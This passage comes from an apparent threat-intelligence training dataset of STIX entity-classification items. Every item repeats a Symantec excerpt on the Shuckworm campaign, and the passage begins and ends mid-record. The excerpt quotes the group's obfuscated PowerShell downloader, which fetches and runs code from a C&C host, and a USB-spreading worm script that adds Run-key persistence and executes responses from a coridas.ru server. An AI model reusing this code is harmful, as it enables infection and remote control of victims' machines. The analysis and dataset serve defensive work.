"input": "### Entity:\niNdEx.phP\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nINdEX.PHp\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nShuckworm\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nfoto.safe\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_\n_coPy-item .\\\"fOtO.safe\" -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp_\n_WHile($CoUNT -lE 2){_\n_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_\n_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_\n_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";_\n_$Drive.naMe FOreaCH-oBJecT{_\n_$CHiLdS = GET-ChilDITem $drivE.nAMe_\n_foReach($cHilDs IN $chiLDs)_\n_{_\n_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_\n_{_\n_sET-lnk $chILds.fUlLName_\n_}}_\n_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_\n_SEt-lNK $DRivE.name_\n_}}_\n_STArt-SLEeP -S 300;_\n_}_\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\niNdEX.pHp\n\n---\n\n### Text Passage:\nTypical Attack Chain\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers\u2019 C&C server:\n`\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"`\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group\u2019s scripts observed per month between January and April 2023.\nNext, a VBS script, which was Shuckworm\u2019s Pterodo backdoor, was executed:\n* CSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\" translates as \"usb-drive\".\nThe foto.safe file is a Base64-encoded script.\nDecoded it looks like the following:\n_fUNCtIon sET-lnK ($chILd) {_\n_$nAMetxt = \"foto.sAfe\".TolowER();_\n_$NAmE = (\"\u043a\u041e\u041c\u041f\u0420\u041e\u041c\u0430\u0442\", \"\u041a\u041e\u0420\u0417\u0438\u041d\u0410\", \"\u0421\u0435\u041a\u0420\u0435\u0442\u043d\u041e\" GeT-rAnDOm).ToUPPeR();_\n_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_\n_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");_\n_$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";_\n_$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();_\n_$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt OUT-STrIng))\".TOlower();_\n_$sHORTCUT.ArGUMEnTs = $tExt;_\n_$sHortCUT.saVE();_\n_$mYfIlE= $chIlD+\"\\$naMeTXT\"_\n_cOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE_\n_$FIlE=GEt-ITEM $mYfiLE -forCe_\n_$FiLe.ATtRiButes='hiDDEN'_\n__\n_}_\n_Set-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE 